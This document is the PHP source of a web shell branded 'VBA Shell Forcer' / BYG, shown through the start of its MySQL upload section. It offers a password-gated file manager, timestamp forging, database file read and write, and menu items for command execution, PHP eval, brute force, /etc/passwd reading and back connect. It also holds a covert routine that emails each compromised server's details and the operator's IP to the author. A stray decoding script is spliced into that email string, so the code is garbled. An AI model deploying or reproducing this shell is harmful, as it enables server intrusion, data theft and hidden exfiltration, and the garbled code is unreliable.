1 <?php
2 /****************************************\
3 |* VBA SHELL FORCER - VERSION 2.1 *|
4 |* Edit & Develop by VBATEAM *|
5 |* http://vbateam.net *|
6 |* == Hacking & Security == *|
7 \****************************************/
8 error_reporting(7);
9 @set_magic_quotes_runtime(0);
10 ob_start();
11 $mtime = explode(' ', microtime());
12 $starttime = $mtime[1] + $mtime[0];
13 define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
14 //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
15 define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
16 define('IS_COM', class_exists('COM') ? 1 : 0);
17 define('IS_GPC', get_magic_quotes_gpc());
18 $dis_func = get_cfg_var('disable_functions');
19 define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
20 @set_time_limit(0);
21 foreach (array('_GET', '_POST') as $_request) {
22 foreach ($$_request as $_key => $_value) {
23 if ($_key{0} != '_') {
24 if (IS_GPC) {
25 $_value = s_array($_value);
26 }
27 $$_key = $_value;
28 }
29 }
30 }
31 /*================= Info Login ================*/
32 $admin = array();
33 $admin['check'] = true;
34 $admin['pass'] = 'byg'; // Password login
35 $admin['cookiepre'] = '';
36 $admin['cookiedomain'] = '';
37 $admin['cookiepath'] = '/';
38 $admin['cookielife'] = 86400;
39 /*===================== End =====================*/
40 if ($charset == 'utf8') {
41 header("content-Type: text/html; charset=utf-8");
42 } elseif ($charset == 'big5') {
43 header("content-Type: text/html; charset=big5");
44 } elseif ($charset == 'gbk') {
45 header("content-Type: text/html; charset=gbk");
46 } elseif ($charset == 'latin1') {
47 header("content-Type: text/html; charset=iso-8859-2");
48 }
49 $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
50 $timestamp = time();
51 /*===================== Login =====================*/
52 if ($action == "logout") {
53 scookie('vbapass', '', -86400 * 365);
54 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
55 p('<body background=black>');
56 exit;
57 }
58 if ($admin['check']) {
59 if ($doing == 'login') {
60 if ($admin['pass'] == $password) {
61 scookie('vbapass', $password);
62 // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
63 $time_shell = "" . date("d/m/Y - H:i:s") . "";
64 $ip_remote = $_SERVER["REMOTE_ADDR"];
65 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
66 $to_email = 'minhduong.pjn@gmail.com
67 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */';
68 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
69 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
70 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
71 @mail($to_email, $server_mail, $linkcr, $header);
72 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
73 p('<body bgcolor=black>
74 <BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG - The Legend of Vietnamese Hacker World - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
75 exit;
76 } else {
77 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
78 echo $err_mess;
79 }
80 }
81 if ($_COOKIE['vbapass']) {
82 if ($_COOKIE['vbapass'] != $admin['pass']) {
83 loginpage();
84 }
85 } else {
86 loginpage();
87 }
88 }
89 /*===================== Login =====================*/
90 $errmsg = '';
91 if ($action == 'phpinfo') {
92 if (IS_PHPINFO) {
93 phpinfo();
94 } else {
95 $errmsg = 'phpinfo() function has non-permissible';
96 }
97 }
98 if ($doing == 'downfile' && $thefile) {
99 if (!@file_exists($thefile)) {
100 $errmsg = 'The file you want Downloadable was nonexistent';
101 } else {
102 $fileinfo = pathinfo($thefile);
103 header('Content-type: application/x-' . $fileinfo['extension']);
104 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
105 header('Content-Length: ' . filesize($thefile));
106 @readfile($thefile);
107 exit;
108 }
109 }
110 if ($doing == 'backupmysql' && !$saveasfile) {
111 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
112 $table = array_flip($table);
113 $result = q("SHOW tables");
114 if (!$result) p('<h2>' . mysql_error() . '</h2>');
115 $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
116 header('Content-type: application/unknown');
117 header('Content-Disposition: attachment; filename=' . $filename);
118 $mysqldata = '';
119 while ($currow = mysql_fetch_array($result)) {
120 if (isset($table[$currow[0]])) {
121 $mysqldata.= sqldumptable($currow[0]);
122 }
123 }
124 mysql_close();
125 exit;
126 }
127 // Mysql
128 if ($doing == 'mysqldown') {
129 if (!$dbname) {
130 $errmsg = 'Please input dbname';
131 } else {
132 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
133 if (!file_exists($mysqldlfile)) {
134 $errmsg = 'The file you want Downloadable was nonexistent';
135 } else {
136 $result = q("select load_file('$mysqldlfile');");
137 if (!$result) {
138 q("DROP TABLE IF EXISTS tmp_angel;");
139 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
140 //Download SQL
141 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
142 $result = q("select content from tmp_angel");
143 q("DROP TABLE tmp_angel");
144 }
145 $row = @mysql_fetch_array($result);
146 if (!$row) {
147 $errmsg = 'Load file failed ' . mysql_error();
148 } else {
149 $fileinfo = pathinfo($mysqldlfile);
150 header('Content-type: application/x-' . $fileinfo['extension']);
151 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
152 header("Accept-Length: " . strlen($row[0]));
153 echo $row[0];
154 exit;
155 }
156 }
157 }
158 }
159 ?>
160 <html>
161 <head>
162 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
163 <title><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?></title>
164 <style type="text/css">
165 body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
166
167 a {color: #74A202;text-decoration:none;}
168 a:hover{color: #f00;text-decoration:underline;}
169 .alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
170 .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
171 .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
172 .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
173 .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
174 .head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
175 .head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
176 .head td span{font-weight:normal;}
177 form{margin:0;padding:0;}
178 h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
179 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
180 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
181 input, textarea, button
182 {
183 font-size: 9pt;
184 color: #ccc;
185 font-family: verdana, sans-serif;
186 background-color: #202020;
187 border-left: 1px solid #74A202;
188 border-top: 1px solid #74A202;
189 border-right: 1px solid #74A202;
190 border-bottom: 1px solid #74A202;
191 }
192 select
193 {
194 font-size: 8pt;
195 font-weight: normal;
196 color: #ccc;
197 font-family: verdana, sans-serif;
198 background-color: #202020;
199 }
200
201 </style>
202 <script type="text/javascript">
203 function CheckAll(form) {
204 for(var i=0;i<form.elements.length;i++) {
205 var e = form.elements[i];
206 if (e.name != 'chkall')
207 e.checked = form.chkall.checked;
208 }
209 }
210 function $(id) {
211 return document.getElementById(id);
212 }
213 function goaction(act){
214 $('goaction').action.value=act;
215 $('goaction').submit();
216 }
217 </script>
218 </head>
219 <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
220
221
222 <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
223 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
224 <tr>
225 <td align="center" valign=center>
226 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
227 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
228 </div>
229 </td>
230 </tr>
231 </table>
232 </div>
233 <script>
234 var ld=(document.all);
235 var ns4=document.layers;
236 var ns6=document.getElementById&&!document.all;
237 var ie4=document.all;
238 if (ns4)
239 ld=document.loading;
240 else if (ns6)
241 ld=document.getElementById("loading").style;
242 else if (ie4)
243 ld=document.all.loading.style;
244 function init()
245 {
246 if(ns4){ld.visibility="hidden";}
247 else if (ns6||ie4) ld.display="none";
248 }
249 </script>
250
251
252
253
254 <table width="100%" border="0" cellpadding="0" cellspacing="0">
255 <tr class="head_small">
256 <td width=100%>
257 <table width=100%><tr class="head_small"><td width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self; ?>"><img src=http://cB8.upanh.com/19.0.24475887.LHg0/banner.gif height=86 border=0></a></td><td>
258 <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="http://beyeugroup.com" target="_blank"><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
259
260 <?php
261 $curl_on = @function_exists('curl_version');
262 $mysql_on = @function_exists('mysql_connect');
263 $mssql_on = @function_exists('mssql_connect');
264 $pg_on = @function_exists('pg_connect');
265 $ora_on = @function_exists('ocilogon');
266 echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
267 echo "PHP version: <b>" . @phpversion() . "</b> - ";
268 echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
269 echo "MySQL: <b>";
270 $mysql_on = @function_exists('mysql_connect');
271 if ($mysql_on) {
272 echo "<font color=green>ON</font></b> - ";
273 } else {
274 echo "<font color=red>OFF</font></b> - ";
275 }
276 echo "MSSQL: <b>";
277 $mssql_on = @function_exists('mssql_connect');
278 if ($mssql_on) {
279 echo "<font color=green>ON</font></b> - ";
280 } else {
281 echo "<font color=red>OFF</font></b> - ";
282 }
283 echo "PostgreSQL: <b>";
284 $pg_on = @function_exists('pg_connect');
285 if ($pg_on) {
286 echo "<font color=green>ON</font></b> - ";
287 } else {
288 echo "<font color=red>OFF</font></b> - ";
289 }
290 echo "Oracle: <b>";
291 $ora_on = @function_exists('ocilogon');
292 if ($ora_on) {
293 echo "<font color=green>ON</font></b>";
294 } else {
295 echo "<font color=red>OFF</font></b><BR>";
296 }
297 echo "Disable functions : <b>";
298 if ('' == ($df = @ini_get('disable_functions'))) {
299 echo "<font color=green>NONE</font></b><BR>";
300 } else {
301 echo "<font color=red>$df</font></b><BR>";
302 }
303 echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
304 echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
305 ?>
306 </td></tr></table></td>
307 </tr>
308 <tr class="alt1">
309 <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span> <br />
310 --------------------------------------------------------------------------------------<br />
311
312 <a href="javascript:goaction('file');">File Manager</a> |
313 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
314 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
315 <a href="javascript:goaction('shell');">Execute Command</a> |
316 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
317 <a href="javascript:goaction('eval');">Eval PHP Code</a>
318 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
319 } ?>
320 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
321 } ?>
322 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
323 } ?>
324 </td>
325 </tr>
326 </table>
327 <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
328 <?php
329 formhead(array('name' => 'goaction'));
330 makehide('action');
331 formfoot();
332 $errmsg && m($errmsg);
333 // Dir function
334 !$dir && $dir = '.';
335 $nowpath = getPath(SA_ROOT, $dir);
336 if (substr($dir, -1) != '/') {
337 $dir = $dir . '/';
338 }
339 $uedir = ue($dir);
340 if (!$action || $action == 'file') {
341 // Non-writeable
342 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
343 // Delete dir
344 if ($doing == 'deldir' && $thefile) {
345 if (!file_exists($thefile)) {
346 m($thefile . ' directory does not exist');
347 } else {
348 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
349 }
350 }
351 // Create new dir
352 elseif ($newdirname) {
353 $mkdirs = $nowpath . $newdirname;
354 if (file_exists($mkdirs)) {
355 m('Directory has already existed');
356 } else {
357 m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
358 @chmod($mkdirs, 0777);
359 }
360 }
361 // Upload file
362 elseif ($doupfile) {
363 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
364 }
365 // Edit file
366 elseif ($editfilename && $filecontent) {
367 $fp = @fopen($editfilename, 'w');
368 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
369 @fclose($fp);
370 }
371 // Modify
372 elseif ($pfile && $newperm) {
373 if (!file_exists($pfile)) {
374 m('The original file does not exist');
375 } else {
376 $newperm = base_convert($newperm, 8, 10);
377 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
378 }
379 }
380 // Rename
381 elseif ($oldname && $newfilename) {
382 $nname = $nowpath . $newfilename;
383 if (file_exists($nname) || !file_exists($oldname)) {
384 m($nname . ' has already existed or original file does not exist');
385 } else {
386 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
387 }
388 }
389 // Copu
390 elseif ($sname && $tofile) {
391 if (file_exists($tofile) || !file_exists($sname)) {
392 m('The goal file has already existed or original file does not exist');
393 } else {
394 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
395 }
396 }
397 // File exit
398 elseif ($curfile && $tarfile) {
399 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
400 m('The goal file has already existed or original file does not exist');
401 } else {
402 $time = @filemtime($tarfile);
403 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
404 }
405 }
406 // Date
407 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
408 if (!@file_exists($curfile)) {
409 m(basename($curfile) . ' does not exist');
410 } else {
411 $time = strtotime("$year-$month-$day $hour:$minute:$second");
412 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
413 }
414 }
415 // Download
416 elseif ($doing == 'downrar') {
417 if ($dl) {
418 $dfiles = '';
419 foreach ($dl as $filepath => $value) {
420 $dfiles.= $filepath . ',';
421 }
422 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
423 $dl = explode(',', $dfiles);
424 $zip = new PHPZip($dl);
425 $code = $zip->out;
426 header('Content-type: application/octet-stream');
427 header('Accept-Ranges: bytes');
428 header('Accept-Length: ' . strlen($code));
429 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
430 echo $code;
431 exit;
432 } else {
433 m('Please select file(s)');
434 }
435 }
436 // Delete file
437 elseif ($doing == 'delfiles') {
438 if ($dl) {
439 $dfiles = '';
440 $succ = $fail = 0;
441 foreach ($dl as $filepath => $value) {
442 if (@unlink($filepath)) {
443 $succ++;
444 } else {
445 $fail++;
446 }
447 }
448 m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
449 } else {
450 m('Please select file(s)');
451 }
452 }
453 // Function Newdir
454 formhead(array('name' => 'createdir'));
455 makehide('newdirname');
456 makehide('dir', $nowpath);
457 formfoot();
458 formhead(array('name' => 'fileperm'));
459 makehide('newperm');
460 makehide('pfile');
461 makehide('dir', $nowpath);
462 formfoot();
463 formhead(array('name' => 'copyfile'));
464 makehide('sname');
465 makehide('tofile');
466 makehide('dir', $nowpath);
467 formfoot();
468 formhead(array('name' => 'rename'));
469 makehide('oldname');
470 makehide('newfilename');
471 makehide('dir', $nowpath);
472 formfoot();
473 formhead(array('name' => 'fileopform'));
474 makehide('action');
475 makehide('opfile');
476 makehide('dir');
477 formfoot();
478 $free = @disk_free_space($nowpath);
479 !$free && $free = 0;
480 $all = @disk_total_space($nowpath);
481 !$all && $all = 0;
482 $used = $all - $free;
483 $used_percent = @round(100 / ($all / $free), 2);
484 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
485 ?>
486 <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
487 <form action="" method="post" id="godir" name="godir">
488 <tr>
489 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
490 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
491 <td nowrap><input class="bt" value="GO" type="submit"></td>
492 </tr>
493 </form>
494 </table>
495 <script type="text/javascript">
496 function createdir(){
497 var newdirname;
498 newdirname = prompt('Please input the directory name:', '');
499 if (!newdirname) return;
500 $('createdir').newdirname.value=newdirname;
501 $('createdir').submit();
502 }
503 function fileperm(pfile){
504 var newperm;
505 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
506 if (!newperm) return;
507 $('fileperm').newperm.value=newperm;
508 $('fileperm').pfile.value=pfile;
509 $('fileperm').submit();
510 }
511 function copyfile(sname){
512 var tofile;
513 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
514 if (!tofile) return;
515 $('copyfile').tofile.value=tofile;
516 $('copyfile').sname.value=sname;
517 $('copyfile').submit();
518 }
519 function rename(oldname){
520 var newfilename;
521 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
522 if (!newfilename) return;
523 $('rename').newfilename.value=newfilename;
524 $('rename').oldname.value=oldname;
525 $('rename').submit();
526 }
527 function dofile(doing,thefile,m){
528 if (m && !confirm(m)) {
529 return;
530 }
531 $('filelist').doing.value=doing;
532 if (thefile){
533 $('filelist').thefile.value=thefile;
534 }
535 $('filelist').submit();
536 }
537 function createfile(nowpath){
538 var filename;
539 filename = prompt('Please input the file name:', '');
540 if (!filename) return;
541 opfile('editfile',nowpath + filename,nowpath);
542 }
543 function opfile(action,opfile,dir){
544 $('fileopform').action.value=action;
545 $('fileopform').opfile.value=opfile;
546 $('fileopform').dir.value=dir;
547 $('fileopform').submit();
548 }
549 function godir(dir,view_writable){
550 if (view_writable) {
551 $('godir').view_writable.value=1;
552 }
553 $('godir').dir.value=dir;
554 $('godir').submit();
555 }
556 </script>
557 <?php
558 tbhead();
559 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
560 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
561 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
562 if ($view_writable) {
563 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
564 } else {
565 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
566 }
567 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
568 if (IS_WIN && IS_COM) {
569 $obj = new COM('scripting.filesystemobject');
570 if ($obj && is_object($obj)) {
571 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
572 foreach ($obj->Drives as $drive) {
573 if ($drive->DriveType == 2) {
574 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
575 } else {
576 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
577 }
578 }
579 }
580 }
581 p('</td></tr></form>');
582 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
583 // Get path
584 $dirdata = array();
585 $filedata = array();
586 if ($view_writable) {
587 $dirdata = GetList($nowpath);
588 } else {
589 // Open dir
590 $dirs = @opendir($dir);
591 while ($file = @readdir($dirs)) {
592 $filepath = $nowpath . $file;
593 if (@is_dir($filepath)) {
594 $dirdb['filename'] = $file;
595 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
596 $dirdb['dirchmod'] = getChmod($filepath);
597 $dirdb['dirperm'] = getPerms($filepath);
598 $dirdb['fileowner'] = getUser($filepath);
599 $dirdb['dirlink'] = $nowpath;
600 $dirdb['server_link'] = $filepath;
601 $dirdb['client_link'] = ue($filepath);
602 $dirdata[] = $dirdb;
603 } else {
604 $filedb['filename'] = $file;
605 $filedb['size'] = sizecount(@filesize($filepath));
606 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
607 $filedb['filechmod'] = getChmod($filepath);
608 $filedb['fileperm'] = getPerms($filepath);
609 $filedb['fileowner'] = getUser($filepath);
610 $filedb['dirlink'] = $nowpath;
611 $filedb['server_link'] = $filepath;
612 $filedb['client_link'] = ue($filepath);
613 $filedata[] = $filedb;
614 }
615 } // while
616 unset($dirdb);
617 unset($filedb);
618 @closedir($dirs);
619 }
620 @sort($dirdata);
621 @sort($filedata);
622 $dir_i = '0';
623 foreach ($dirdata as $key => $dirdb) {
624 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
625 $thisbg = bg();
626 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
627 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
628 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
629 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
630 p('<td nowrap>--</td>');
631 p('<td nowrap>');
632 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
633 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
634 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
635 p('</tr>');
636 $dir_i++;
637 } else {
638 if ($dirdb['filename'] == '..') {
639 p('<tr class=fout>');
640 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
641 p('</tr>');
642 }
643 }
644 }
645 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
646 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
647 makehide('action', 'file');
648 makehide('thefile');
649 makehide('doing');
650 makehide('dir', $nowpath);
651 $file_i = '0';
652 foreach ($filedata as $key => $filedb) {
653 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
654 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
655 $thisbg = bg();
656 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
657 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
658 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
659 p('<td nowrap>' . $filedb['mtime'] . '</td>');
660 p('<td nowrap>' . $filedb['size'] . '</td>');
661 p('<td nowrap>');
662 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
663 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
664 p('<td nowrap>');
665 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
666 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
667 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
668 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
669 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
670 p('</td></tr>');
671 $file_i++;
672 }
673 }
674 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
675 p('</form></table>');
676 } // end dir
677 elseif ($action == 'sqlfile') {
678 if ($doing == "mysqlupload") {
679 $file = $_FILES['uploadfile'];
680 $filename = $file['tmp_name'];
681 if (file_exists($savepath)) {
682 m('The goal file has already existed');
683 } else {
684 if (!$filename) {
685 m('Please choose a file');
686 } else {
687 $fp = @fopen($filename, 'r');
688 $contents = @fread($fp, filesize($filename));
689 @fclose($fp);
690 $contents = bin2hex($contents);
691 if (!$upname) $upname = $file['name'];
692 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
693 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
694 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
695 }
696 }
697 }
698 ?>
699 <script type="text/javascript">
700 function mysqlfile(doing){
701 if(!doing) return;
702 $('doing').value=doing;
703 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
704 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
705 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
706 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
707 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
708 $('mysqlfile').charset.value=$('dbinfo').charset.value;
709 $('mysqlfile').submit();
710 }
711 </script>
712 <?php
713 !$dbhost && $dbhost = 'localhost';
714 !$dbuser && $dbuser = 'root';
715 !$dbport && $dbport = '3306';
716 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
717 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
718 makehide('action', 'sqlfile');
719 p('<p>');
720 p('DBHost:');
721 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
722 p(':');
723 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
